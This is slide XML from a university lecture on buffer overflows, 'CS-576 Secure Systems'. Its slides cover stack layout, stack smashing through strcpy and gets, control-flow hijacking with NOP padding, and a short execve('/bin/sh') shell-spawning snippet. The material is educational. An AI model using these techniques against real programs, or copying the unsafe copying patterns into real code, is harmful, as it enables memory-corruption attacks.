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6" r:id="rId20"/>
    <p:sldId id="289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28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339" r:id="rId54"/>
    <p:sldId id="338" r:id="rId55"/>
    <p:sldId id="340" r:id="rId56"/>
    <p:sldId id="283" r:id="rId57"/>
    <p:sldId id="341" r:id="rId58"/>
    <p:sldId id="342" r:id="rId59"/>
    <p:sldId id="343" r:id="rId60"/>
    <p:sldId id="344" r:id="rId61"/>
    <p:sldId id="345" r:id="rId62"/>
    <p:sldId id="346" r:id="rId63"/>
    <p:sldId id="284" r:id="rId64"/>
    <p:sldId id="347" r:id="rId65"/>
    <p:sldId id="348" r:id="rId66"/>
    <p:sldId id="349" r:id="rId67"/>
    <p:sldId id="35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8891" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="109" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="1332" y="96"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-54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C606F-6729-4E5E-B693-314D9C3716E3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47FC0-B535-409A-8203-EC8B8A4DB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5560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129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250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0712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196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64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731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3075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552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9045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813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573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194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786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3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09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7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9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3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3639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7307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544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23099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5936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500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8193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2682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8599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2110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86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328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7FC0-B535-409A-8203-EC8B8A4DBF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5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776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700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245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746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187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87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08" y="608521"/>
            <a:ext cx="7770756" cy="11413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907" y="6246622"/>
            <a:ext cx="1903392" cy="45567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Fall 2014</a:t>
            </a:r>
            <a:endParaRPr lang="el-G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3736" y="6246622"/>
            <a:ext cx="2895100" cy="45567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CS-576 Secure systems</a:t>
            </a:r>
            <a:endParaRPr lang="el-G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71" y="6246622"/>
            <a:ext cx="1904822" cy="455676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3D6F081F-0799-40B0-8DF0-C296370F3B80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48419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CS-576 Secure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E541-C3AF-4688-A032-DE03395D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Secure Systems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer Overflows </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(and other undesirables)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Georgios Portokalidis</a:t>
            </a:r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Heap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Contains dynamically allocated data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Used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malloc()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>free()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Read-write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10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38008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Stack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Contains arguments, local variables, return addresses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Read-write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11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03112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Stack grows towards low memory addresses (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)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Heap grows towards high memory addresses (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429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12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96283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n-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack basics</a:t>
            </a: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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stack is a contiguous block of memory containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>data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dirty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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The bottom of the stack is at fixed address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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dirty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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Its size is dynamically adjusted by kernel at run time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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dirty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dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CPU implements instructions to PUSH onto and POP off the stack.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dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/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13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942407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 dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack Basics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Frame Pointer (FP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2160" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2160" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Lohit Hindi" charset="0"/>
              <a:cs typeface="Lohit Hindi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1490" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1490" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to the bottom of each stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1490" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1490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sz="1490" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Stack Pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2160" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2429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1490" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1490" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to the top of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1490" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1490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endParaRPr lang="el-GR" altLang="en-US" sz="1490" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Instruction Pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2160" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2160" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="865732" lvl="2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</a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1490" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Points </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1490" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the the next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="1490" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>instruction</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" altLang="en-US" sz="1490" dirty="0">
              <a:latin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7235" y="4747491"/>
            <a:ext cx="3408220" cy="1320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Name the registers used for these pointers in various architectures?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14</a:t>
            </a:fld>
            <a:endParaRPr lang="el-G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54559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Simple Function Call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1660" y="1736998"/>
            <a:ext cx="4228219" cy="492959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160">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When the program starts FP and SP point to the same address (empty stack)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09" y="1645577"/>
            <a:ext cx="4623900" cy="512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15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66070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Simple Function Call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1660" y="1736998"/>
            <a:ext cx="4228219" cy="492959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When function is called, it pushes its function argument on the stack.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41" y="1594153"/>
            <a:ext cx="4881021" cy="524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16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001403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Simple Function Call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1660" y="1736998"/>
            <a:ext cx="4228219" cy="492959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Then, pushes the IP on the stack and saves FP of main on the stack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08" y="1662718"/>
            <a:ext cx="4666754" cy="51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17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31404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Simple Function Call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1660" y="1736998"/>
            <a:ext cx="4228219" cy="492959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Then, FP points to the start of the stack frame of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2429" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>function()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09" y="1662718"/>
            <a:ext cx="4598188" cy="510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18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556413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Smashing the Stack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l-GR" altLang="en-US" sz="2429" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stuff more data into a buffer that it can actually hold</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because of …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insufficient input checks/wrong assumptions about input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unchecked buffer size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integer overflows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://www.pulsemed.org/over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6655"/>
            <a:ext cx="2553854" cy="255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305964" y="4274250"/>
            <a:ext cx="1610574" cy="1276805"/>
            <a:chOff x="7305964" y="4274250"/>
            <a:chExt cx="1610574" cy="1276805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7468769" y="4274250"/>
              <a:ext cx="1447769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Your memory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305964" y="4643582"/>
              <a:ext cx="886690" cy="9074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2972" y="1590483"/>
            <a:ext cx="2475978" cy="433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C, C++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182133" y="1590483"/>
            <a:ext cx="2475978" cy="433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Java, C#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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811294" y="1590483"/>
            <a:ext cx="2475978" cy="433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Python, Perl, PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Control-flow Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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28650" y="1825625"/>
            <a:ext cx="3269095" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pointing the IP to a (usually) arbitrary address </a:t>
            </a:r>
            <a:endParaRPr lang="el-G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1313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0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160">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2160" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>function()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2160">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> will be called, stack will look like this.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5" y="1182759"/>
            <a:ext cx="449391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21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622565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160" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="2160">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> will copy charaters of large_string to buffer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22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645313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Buffer will overflow, overwriting all data above it!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>
              <a:latin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23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481217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Buffer will overflow, overwriting all data above it!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>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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24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3913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Buffer will overflow, overwriting all data above it!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>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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25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373071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Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="3869" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" altLang="en-US" sz="3869" dirty="0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 dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Return address (which had been overwritten), will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 dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>produce a segmentation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 dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fault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61" y="1182759"/>
            <a:ext cx="512100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79055" y="3999345"/>
            <a:ext cx="2059709" cy="13946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But not always!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26</a:t>
            </a:fld>
            <a:endParaRPr lang="el-G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609945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Control-Flow Hijacking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109762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n-US" altLang="en-US" sz="2429" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The user controls the input and knows when to stop!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 dirty="0">
              <a:latin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87932" y="4152073"/>
            <a:ext cx="3240811" cy="1814586"/>
            <a:chOff x="1287932" y="4152073"/>
            <a:chExt cx="3240811" cy="1814586"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1287932" y="4152073"/>
              <a:ext cx="1882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gets(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>large_string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3170627" y="4336739"/>
              <a:ext cx="1358116" cy="1629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70825" y="3262970"/>
            <a:ext cx="2516907" cy="889103"/>
            <a:chOff x="970825" y="3262970"/>
            <a:chExt cx="2516907" cy="889103"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="970825" y="3262970"/>
              <a:ext cx="2516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“AAAAAAAAAAAABBBB”;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142836" y="3632302"/>
              <a:ext cx="212437" cy="519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Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874328" y="274263"/>
            <a:ext cx="2706254" cy="947986"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45931"/>
              <a:gd name="adj2" fmla="val 813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happening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27</a:t>
            </a:fld>
            <a:endParaRPr lang="el-G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766734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Control-Flow Hijacking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109762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n-US" altLang="en-US" sz="2429" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The user controls the input and knows when to stop!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endParaRPr lang="el-GR" altLang="en-US" sz="2429" dirty="0">
              <a:latin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14" y="1182759"/>
            <a:ext cx="4485341" cy="5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87932" y="4152073"/>
            <a:ext cx="3240811" cy="1814586"/>
            <a:chOff x="1287932" y="4152073"/>
            <a:chExt cx="3240811" cy="1814586"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1287932" y="4152073"/>
              <a:ext cx="1882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gets(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>large_string</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>);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3170627" y="4336739"/>
              <a:ext cx="1358116" cy="16299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70825" y="3262970"/>
            <a:ext cx="2420086" cy="889103"/>
            <a:chOff x="970825" y="3262970"/>
            <a:chExt cx="2420086" cy="889103"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="970825" y="3262970"/>
              <a:ext cx="2420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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>AAAAAAAAAAAA</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
                <a:t>xxxx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>”;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2142836" y="3632302"/>
              <a:ext cx="212437" cy="519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28</a:t>
            </a:fld>
            <a:endParaRPr lang="el-G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199397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29</a:t>
            </a:fld>
            <a:endParaRPr lang="el-GR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206870" y="3587262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06870" y="3974123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ret(main)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870" y="4360984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6870" y="4747845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6870" y="1063870"/>
            <a:ext cx="1116624" cy="2523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98024" y="3587262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98024" y="3974123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698024" y="4360984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8024" y="4747845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8024" y="1063870"/>
            <a:ext cx="1116624" cy="2523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8650" y="3248463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LARGE_STRING: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06870" y="492369"/>
            <a:ext cx="1116624" cy="5618285"/>
            <a:chOff x="2206870" y="492369"/>
            <a:chExt cx="1116624" cy="5618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8148380">
            <a:off x="2386135" y="543003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8148380">
            <a:off x="2356118" y="59345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35009" y="896816"/>
            <a:ext cx="852854" cy="967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EVIL CODE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Curved Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6638193" y="1380393"/>
            <a:ext cx="896817" cy="6418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30778" y="172329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?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Compiles to machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typed but weakly enforced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Low-level memory access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User manages memory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30</a:t>
            </a:fld>
            <a:endParaRPr lang="el-GR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206870" y="3587262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06870" y="3974123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ret(main)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870" y="4360984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6870" y="4747845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6870" y="1063870"/>
            <a:ext cx="1116624" cy="2523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98024" y="3587262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98024" y="3974123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698024" y="4360984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98024" y="4747845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98024" y="1037495"/>
            <a:ext cx="1116624" cy="13891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8650" y="3248463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LARGE_STRING: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06870" y="492369"/>
            <a:ext cx="1116624" cy="5618285"/>
            <a:chOff x="2206870" y="492369"/>
            <a:chExt cx="1116624" cy="5618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8148380">
            <a:off x="2386135" y="543003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8148380">
            <a:off x="2356118" y="59345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35009" y="896816"/>
            <a:ext cx="852854" cy="967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EVIL CODE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Curved Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="1"/>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5814649" y="1380393"/>
            <a:ext cx="1720361" cy="3516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98023" y="2427160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698023" y="2814021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98023" y="3200882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41414141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57465" y="21409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0xbfffb900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36" name="Curved Connector 35"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5362817" y="3072421"/>
            <a:ext cx="1546964" cy="6433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31</a:t>
            </a:fld>
            <a:endParaRPr lang="el-GR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206870" y="3587262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06870" y="3974123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ret(main)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870" y="4360984"/>
            <a:ext cx="1116624" cy="3868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6870" y="4747845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6870" y="1063870"/>
            <a:ext cx="1116624" cy="2523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8650" y="3248463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LARGE_STRING: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06870" y="492369"/>
            <a:ext cx="1116624" cy="5618285"/>
            <a:chOff x="2206870" y="492369"/>
            <a:chExt cx="1116624" cy="5618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8148380">
            <a:off x="2386135" y="543003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8148380">
            <a:off x="2356118" y="59345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06869" y="5134706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32</a:t>
            </a:fld>
            <a:endParaRPr lang="el-GR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2206870" y="3587262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06870" y="3974123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ret(main)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870" y="4360984"/>
            <a:ext cx="1116624" cy="3868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6870" y="4747845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6870" y="1063870"/>
            <a:ext cx="1116624" cy="25233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arge_string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98024" y="3587262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98024" y="3974123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698024" y="4360984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698024" y="4747845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98023" y="2029067"/>
            <a:ext cx="1116624" cy="408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NOPs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3248463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LARGE_STRING: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06870" y="492369"/>
            <a:ext cx="1116624" cy="5618285"/>
            <a:chOff x="2206870" y="492369"/>
            <a:chExt cx="1116624" cy="5618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8148380">
            <a:off x="2386135" y="5430032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8148380">
            <a:off x="2356118" y="593454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98023" y="1029667"/>
            <a:ext cx="1116624" cy="101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EVIL CODE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98023" y="2427160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4698023" y="2814021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698023" y="3200882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2206869" y="5134706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98023" y="5134706"/>
            <a:ext cx="1116624" cy="386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xxxx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Cloud Callout 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6330461" y="3472962"/>
            <a:ext cx="1881553" cy="1412748"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68029"/>
              <a:gd name="adj2" fmla="val 301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target address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Cloud Callout 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6330461" y="1069849"/>
            <a:ext cx="1881553" cy="1412748"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68029"/>
              <a:gd name="adj2" fmla="val 301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NOPs padding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24144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Named like this because…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33</a:t>
            </a:fld>
            <a:endParaRPr lang="el-GR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52500" y="2684703"/>
            <a:ext cx="7239000" cy="30333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#include &lt;stdio.h&gt;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2000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void main()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    char *name[2];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2000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    name[0] = "/bin/sh";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    name[1] = NULL;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2000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    execve(name[0], name, NULL);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2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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00750" y="2328995"/>
            <a:ext cx="2514600" cy="13338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first attacks used injected code to spawn a shell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Deal!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4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2493591"/>
            <a:ext cx="648657" cy="6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300px/svg_to_png/176818/User_Icon_Remix_by_Merlin25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4089926"/>
            <a:ext cx="767060" cy="11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9408" y="2151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028" y="372059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11" name="Bevel 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826976" y="2493591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2" name="Bevel 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3927963" y="1462256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3" name="Bevel 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3294916" y="2761003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4" name="Bevel 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056181" y="4219428"/>
            <a:ext cx="1414831" cy="880194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Privileged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922476" y="2817920"/>
            <a:ext cx="1779086" cy="184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2040879" y="2761003"/>
